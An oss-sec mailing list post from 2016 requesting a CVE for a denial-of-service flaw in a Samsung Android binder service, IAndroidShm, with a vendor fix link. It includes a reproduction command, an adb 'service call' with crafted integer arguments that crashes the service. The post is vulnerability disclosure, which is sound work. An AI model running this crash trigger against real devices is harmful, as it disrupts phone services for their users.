oss-sec mailing list archives
CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS
From: Vinc3nt4H <pengdawei521 () 163 com>
Date: Thu, 5 May 2016 21:07:29 +0800 (CST)
Hi, Description of the potential vulnerability: When a app send a evil data to com.samsung.android.jam.IAndroidShm service by service command (Android system command) , can cause to IAndroidShm service crash. Steps to reproduce the issue: 1 A PC connect S6 device; 2 Input command: adb shell; 3 Android Input command: service call com.samsung.android.jam.IAndroidShm 5 i32 917154658 i32 998369275 i32 1652062893 i32 2113420870 i32 1380178743 i32 47342718 i32 543810222 i32 1481030271 Affected versions: KK(4.4), L(5.0/5.1) Fix: http://security.samsungmobile.com/smrupdate.html#SMR-JAN-2016 SVE-2015-5133: IAndroidShm IAPAService service DoS We report this to samsung, samsung reply to us if we want to get CVE request it by ourself. Best regards, Vinc3nt4H of Alibaba Mobile Security Team
Current thread:
- CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS Vinc3nt4H (May 05)